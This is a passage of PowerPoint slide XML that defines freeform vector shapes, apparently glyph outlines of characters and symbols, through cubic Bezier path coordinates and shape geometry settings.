                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="76"/>
                    <a:pt x="12" y="84"/>
                    <a:pt x="22" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="84"/>
                    <a:pt x="44" y="75"/>
                    <a:pt x="44" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="55"/>
                    <a:pt x="42" y="50"/>
                    <a:pt x="39" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="33"/>
                    <a:pt x="75" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="30"/>
                    <a:pt x="165" y="46"/>
                    <a:pt x="165" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="74"/>
                    <a:pt x="154" y="80"/>
                    <a:pt x="144" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="125"/>
                    <a:pt x="72" y="170"/>
                    <a:pt x="72" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="209"/>
                    <a:pt x="72" y="215"/>
                    <a:pt x="92" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="215"/>
                    <a:pt x="112" y="212"/>
                    <a:pt x="112" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="187"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="282"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="268"/>
                    <a:pt x="106" y="257"/>
                    <a:pt x="92" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="257"/>
                    <a:pt x="67" y="268"/>
                    <a:pt x="67" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="296"/>
                    <a:pt x="78" y="307"/>
                    <a:pt x="92" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="307"/>
                    <a:pt x="117" y="296"/>
                    <a:pt x="117" y="28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18" name="Freeform 259">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40ADE753-F4D6-45B9-A6F5-CAB760D83E38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId59"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6608764" y="3257551"/>
              <a:ext cx="82550" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 112 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 115 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 109 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="115" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="109" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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19" name="Freeform 260">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D293F3DD-9D89-4E36-9BF9-11DD4CBF96B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId60"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6711951" y="3262313"/>
              <a:ext cx="93663" cy="49213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 223"/>
                <a:gd name="T1" fmla="*/ 35 h 111"/>
                <a:gd name="T2" fmla="*/ 223 w 223"/>
                <a:gd name="T3" fmla="*/ 18 h 111"/>
                <a:gd name="T4" fmla="*/ 198 w 223"/>
                <a:gd name="T5" fmla="*/ 0 h 111"/>
                <a:gd name="T6" fmla="*/ 25 w 223"/>
                <a:gd name="T7" fmla="*/ 0 h 111"/>
                <a:gd name="T8" fmla="*/ 0 w 223"/>
                <a:gd name="T9" fmla="*/ 18 h 111"/>
                <a:gd name="T10" fmla="*/ 22 w 223"/>
                <a:gd name="T11" fmla="*/ 35 h 111"/>
                <a:gd name="T12" fmla="*/ 201 w 223"/>
                <a:gd name="T13" fmla="*/ 35 h 111"/>
                <a:gd name="T14" fmla="*/ 198 w 223"/>
                <a:gd name="T15" fmla="*/ 111 h 111"/>
                <a:gd name="T16" fmla="*/ 223 w 223"/>
                <a:gd name="T17" fmla="*/ 94 h 111"/>
                <a:gd name="T18" fmla="*/ 201 w 223"/>
                <a:gd name="T19" fmla="*/ 76 h 111"/>
                <a:gd name="T20" fmla="*/ 22 w 223"/>
                <a:gd name="T21" fmla="*/ 76 h 111"/>
                <a:gd name="T22" fmla="*/ 0 w 223"/>
                <a:gd name="T23" fmla="*/ 94 h 111"/>
                <a:gd name="T24" fmla="*/ 25 w 223"/>
                <a:gd name="T25" fmla="*/ 111 h 111"/>
                <a:gd name="T26" fmla="*/ 198 w 223"/>
                <a:gd name="T2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11">
                  <a:moveTo>
                    <a:pt x="201" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="35"/>
                    <a:pt x="223" y="35"/>
                    <a:pt x="223" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="0"/>
                    <a:pt x="205" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="16" y="35"/>
                    <a:pt x="22" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="111"/>
                    <a:pt x="223" y="111"/>
                    <a:pt x="223" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="76"/>
                    <a:pt x="207" y="76"/>
                    <a:pt x="201" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="76"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="111"/>
                    <a:pt x="18" y="111"/>
                    <a:pt x="25" y="111"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="11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20" name="Freeform 261">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA524037-76B3-492C-9D65-96F0A0DD5973}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId61"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6859589" y="3217863"/>
              <a:ext cx="19050" cy="65088"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 44 w 45"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 22 w 45"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 0 w 45"/>
                <a:gd name="T5" fmla="*/ 22 h 147"/>
                <a:gd name="T6" fmla="*/ 1 w 45"/>
                <a:gd name="T7" fmla="*/ 32 h 147"/>
                <a:gd name="T8" fmla="*/ 7 w 45"/>
                <a:gd name="T9" fmla="*/ 128 h 147"/>
                <a:gd name="T10" fmla="*/ 22 w 45"/>
                <a:gd name="T11" fmla="*/ 147 h 147"/>
                <a:gd name="T12" fmla="*/ 37 w 45"/>
                <a:gd name="T13" fmla="*/ 128 h 147"/>
                <a:gd name="T14" fmla="*/ 44 w 45"/>
                <a:gd name="T15" fmla="*/ 28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147">
                  <a:moveTo>
                    <a:pt x="44" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="8"/>
                    <a:pt x="34" y="0"/>
                    <a:pt x="22" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="136"/>
                    <a:pt x="8" y="147"/>
                    <a:pt x="22" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="37" y="136"/>
                    <a:pt x="37" y="128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="44"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21" name="Freeform 262">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C3DB9C-2F62-43F4-989F-6939E10327B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId62"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7042151" y="3238501"/>
              <a:ext cx="95250" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 224"/>
                <a:gd name="T1" fmla="*/ 130 h 225"/>
                <a:gd name="T2" fmla="*/ 200 w 224"/>
                <a:gd name="T3" fmla="*/ 130 h 225"/>
                <a:gd name="T4" fmla="*/ 224 w 224"/>
                <a:gd name="T5" fmla="*/ 113 h 225"/>
                <a:gd name="T6" fmla="*/ 200 w 224"/>
                <a:gd name="T7" fmla="*/ 95 h 225"/>
                <a:gd name="T8" fmla="*/ 129 w 224"/>
                <a:gd name="T9" fmla="*/ 95 h 225"/>
                <a:gd name="T10" fmla="*/ 129 w 224"/>
                <a:gd name="T11" fmla="*/ 24 h 225"/>
                <a:gd name="T12" fmla="*/ 112 w 224"/>
                <a:gd name="T13" fmla="*/ 0 h 225"/>
                <a:gd name="T14" fmla="*/ 95 w 224"/>
                <a:gd name="T15" fmla="*/ 24 h 225"/>
                <a:gd name="T16" fmla="*/ 95 w 224"/>
                <a:gd name="T17" fmla="*/ 95 h 225"/>
                <a:gd name="T18" fmla="*/ 24 w 224"/>
                <a:gd name="T19" fmla="*/ 95 h 225"/>
                <a:gd name="T20" fmla="*/ 0 w 224"/>
                <a:gd name="T21" fmla="*/ 113 h 225"/>
                <a:gd name="T22" fmla="*/ 24 w 224"/>
                <a:gd name="T23" fmla="*/ 130 h 225"/>
                <a:gd name="T24" fmla="*/ 95 w 224"/>
                <a:gd name="T25" fmla="*/ 130 h 225"/>
                <a:gd name="T26" fmla="*/ 95 w 224"/>
                <a:gd name="T27" fmla="*/ 201 h 225"/>
                <a:gd name="T28" fmla="*/ 112 w 224"/>
                <a:gd name="T29" fmla="*/ 225 h 225"/>
                <a:gd name="T30" fmla="*/ 129 w 224"/>
                <a:gd name="T31" fmla="*/ 201 h 225"/>
                <a:gd name="T32" fmla="*/ 129 w 224"/>
                <a:gd name="T33" fmla="*/ 13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4" h="225">
                  <a:moveTo>
                    <a:pt x="129" y="130"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200" y="130"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="130"/>
                    <a:pt x="224" y="130"/>
                    <a:pt x="224" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="95"/>
                    <a:pt x="206" y="95"/>
                    <a:pt x="200" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="129" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="18"/>
                    <a:pt x="129" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="0"/>
                    <a:pt x="95" y="18"/>
                    <a:pt x="95" y="24"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="95"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="95"/>
                    <a:pt x="0" y="95"/>
                    <a:pt x="0" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="130"/>
                    <a:pt x="18" y="130"/>
                    <a:pt x="24" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="201"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="207"/>
                    <a:pt x="95" y="225"/>
                    <a:pt x="112" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="225"/>
                    <a:pt x="129" y="207"/>
                    <a:pt x="129" y="201"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="129" y="1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22" name="Freeform 263">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D508554-68BE-4EB8-8BB1-F374E85398F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId63"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1196976" y="3521076"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="30" y="78"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="104"/>
                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="130"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="138"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="222"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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23" name="Freeform 264">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483F66C6-658A-4882-91A2-29474643FB46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId64"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1304926" y="3521076"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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24" name="Freeform 265">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A17137-D13D-4DB2-9F65-E770E23907C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId65"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1419226" y="3521076"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
